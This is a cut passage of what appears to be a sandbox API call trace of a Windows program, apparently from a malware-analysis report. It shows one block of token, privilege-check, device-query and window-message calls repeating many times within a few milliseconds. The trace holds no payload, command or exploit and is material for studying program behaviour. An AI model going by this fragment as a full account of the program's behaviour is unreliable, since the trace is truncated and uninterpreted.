ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.033] GetLastError () returned 0x3f0 [0085.033] GetCurrentProcess () returned 0xffffffff [0085.033] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.033] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.033] SetLastError (dwErrCode=0x522) [0085.033] CloseHandle (hObject=0x114) returned 1 [0085.033] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.033] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.033] GetLastError () returned 0x578 [0085.033] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.033] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.033] GetCurrentThread () returned 0xfffffffe [0085.033] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.033] GetLastError () returned 0x3f0 [0085.033] GetCurrentProcess () returned 0xffffffff [0085.033] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.033] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.033] SetLastError (dwErrCode=0x522) [0085.033] CloseHandle (hObject=0x114) returned 1 [0085.033] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.033] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.033] GetLastError () returned 0x578 [0085.033] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.033] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.033] GetCurrentThread () returned 0xfffffffe [0085.033] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.033] GetLastError () returned 0x3f0 [0085.033] GetCurrentProcess () returned 0xffffffff [0085.033] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.033] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.033] SetLastError (dwErrCode=0x522) [0085.033] CloseHandle (hObject=0x114) returned 1 [0085.034] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.034] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.034] GetLastError () returned 0x578 [0085.034] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.034] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.034] GetCurrentThread () returned 0xfffffffe [0085.034] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.034] GetLastError () returned 0x3f0 [0085.034] GetCurrentProcess () returned 0xffffffff [0085.034] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.034] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.034] SetLastError (dwErrCode=0x522) [0085.034] CloseHandle (hObject=0x114) returned 1 [0085.034] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.034] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.034] GetLastError () returned 0x578 [0085.034] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.034] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.034] GetCurrentThread () returned 0xfffffffe [0085.034] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.034] GetLastError () returned 0x3f0 [0085.034] GetCurrentProcess () returned 0xffffffff [0085.034] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.034] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.034] SetLastError (dwErrCode=0x522) [0085.034] CloseHandle (hObject=0x114) returned 1 [0085.034] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.034] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.034] GetLastError () returned 0x578 [0085.034] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.034] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.034] GetCurrentThread () returned 0xfffffffe [0085.034] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.034] GetLastError () returned 0x3f0 [0085.034] GetCurrentProcess () returned 0xffffffff [0085.034] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.034] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.034] SetLastError (dwErrCode=0x522) [0085.034] CloseHandle (hObject=0x114) returned 1 [0085.034] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.034] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.034] GetLastError () returned 0x578 [0085.034] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.034] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.034] GetCurrentThread () returned 0xfffffffe [0085.034] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.034] GetLastError () returned 0x3f0 [0085.034] GetCurrentProcess () returned 0xffffffff [0085.034] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.034] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.035] SetLastError (dwErrCode=0x522) [0085.035] CloseHandle (hObject=0x114) returned 1 [0085.035] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.035] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.035] GetLastError () returned 0x578 [0085.035] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.035] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.035] GetCurrentThread () returned 0xfffffffe [0085.035] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.035] GetLastError () returned 0x3f0 [0085.035] GetCurrentProcess () returned 0xffffffff [0085.035] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.035] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.035] SetLastError (dwErrCode=0x522) [0085.035] CloseHandle (hObject=0x114) returned 1 [0085.035] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.035] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.035] GetLastError () returned 0x578 [0085.035] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.035] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.035] GetCurrentThread () returned 0xfffffffe [0085.035] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.035] GetLastError () returned 0x3f0 [0085.035] GetCurrentProcess () returned 0xffffffff [0085.035] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.035] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.035] SetLastError (dwErrCode=0x522) [0085.035] CloseHandle (hObject=0x114) returned 1 [0085.035] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.035] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.035] GetLastError () returned 0x578 [0085.035] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.035] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.035] GetCurrentThread () returned 0xfffffffe [0085.035] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.035] GetLastError () returned 0x3f0 [0085.035] GetCurrentProcess () returned 0xffffffff [0085.035] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.035] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.035] SetLastError (dwErrCode=0x522) [0085.035] CloseHandle (hObject=0x114) returned 1 [0085.036] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.036] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.036] GetLastError () returned 0x578 [0085.036] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.036] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.036] GetCurrentThread () returned 0xfffffffe [0085.036] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.036] GetLastError () returned 0x3f0 [0085.036] GetCurrentProcess () returned 0xffffffff [0085.036] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.036] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.036] SetLastError (dwErrCode=0x522) [0085.036] CloseHandle (hObject=0x114) returned 1 [0085.036] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.036] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.036] GetLastError () returned 0x578 [0085.036] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.036] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.036] GetCurrentThread () returned 0xfffffffe [0085.036] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.036] GetLastError () returned 0x3f0 [0085.036] GetCurrentProcess () returned 0xffffffff [0085.036] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.036] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.036] SetLastError (dwErrCode=0x522) [0085.036] CloseHandle (hObject=0x114) returned 1 [0085.036] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.036] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.036] GetLastError () returned 0x578 [0085.036] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.036] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.036] GetCurrentThread () returned 0xfffffffe [0085.036] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.036] GetLastError () returned 0x3f0 [0085.036] GetCurrentProcess () returned 0xffffffff [0085.036] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.036] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.037] SetLastError (dwErrCode=0x522) [0085.037] CloseHandle (hObject=0x114) returned 1 [0085.037] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.037] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.037] GetLastError () returned 0x578 [0085.037] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.037] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.037] GetCurrentThread () returned 0xfffffffe [0085.037] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.037] GetLastError () returned 0x3f0 [0085.037] GetCurrentProcess () returned 0xffffffff [0085.037] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.037] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.037] SetLastError (dwErrCode=0x522) [0085.037] CloseHandle (hObject=0x114) returned 1 [0085.037] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.037] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.037] GetLastError () returned 0x578 [0085.037] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.037] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.037] GetCurrentThread () returned 0xfffffffe [0085.037] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.037] GetLastError () returned 0x3f0 [0085.037] GetCurrentProcess () returned 0xffffffff [0085.037] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.037] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.037] SetLastError (dwErrCode=0x522) [0085.037] CloseHandle (hObject=0x114) returned 1 [0085.037] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.037] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.037] GetLastError () returned 0x578 [0085.037] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.037] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.037] GetCurrentThread () returned 0xfffffffe [0085.037] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.038] GetLastError () returned 0x3f0 [0085.038] GetCurrentProcess () returned 0xffffffff [0085.038] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.038] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.038] SetLastError (dwErrCode=0x522) [0085.038] CloseHandle (hObject=0x114) returned 1 [0085.038] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.038] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.038] GetLastError () returned 0x578 [0085.038] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.038] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.038] GetCurrentThread () returned 0xfffffffe [0085.038] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.038] GetLastError () returned 0x3f0 [0085.038] GetCurrentProcess () returned 0xffffffff [0085.038] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.038] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.038] SetLastError (dwErrCode=0x522) [0085.038] CloseHandle (hObject=0x114) returned 1 [0085.038] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.038] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.038] GetLastError () returned 0x578 [0085.038] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.038] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.038] GetCurrentThread () returned 0xfffffffe [0085.038] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.038] GetLastError () returned 0x3f0 [0085.038] GetCurrentProcess () returned 0xffffffff [0085.038] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.038] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.038] SetLastError (dwErrCode=0x522) [0085.038] CloseHandle (hObject=0x114) returned 1 [0085.038] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.038] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.038] GetLastError () returned 0x578 [0085.038] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.038] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.038] GetCurrentThread () returned 0xfffffffe [0085.038] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.038] GetLastError () returned 0x3f0 [0085.038] GetCurrentProcess () returned 0xffffffff [0085.038] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.038] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.038] SetLastError (dwErrCode=0x522) [0085.038] CloseHandle (hObject=0x114) returned 1 [0085.038] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.038] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.038] GetLastError () returned 0x578 [0085.039] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.039] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.039] GetCurrentThread () returned 0xfffffffe [0085.039] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.039] GetLastError () returned 0x3f0 [0085.039] GetCurrentProcess () returned 0xffffffff [0085.039] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.039] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.039] SetLastError (dwErrCode=0x522) [0085.039] CloseHandle (hObject=0x114) returned 1 [0085.039] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.039] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.039] GetLastError () returned 0x578 [0085.039] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.039] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.039] GetCurrentThread () returned 0xfffffffe [0085.039] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.039] GetLastError () returned 0x3f0 [0085.039] GetCurrentProcess () returned 0xffffffff [0085.039] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.039] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.039] SetLastError (dwErrCode=0x522) [0085.039] CloseHandle (hObject=0x114) returned 1 [0085.039] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.039] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.039] GetLastError () returned 0x578 [0085.039] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.039] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.039] GetCurrentThread () returned 0xfffffffe [0085.039] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.039] GetLastError () returned 0x3f0 [0085.039] GetCurrentProcess () returned 0xffffffff [0085.039] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.039] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.039] SetLastError (dwErrCode=0x522) [0085.039] CloseHandle (hObject=0x114) returned 1 [0085.039] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.039] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.039] GetLastError () returned 0x578 [0085.039] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.039] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.039] GetCurrentThread () 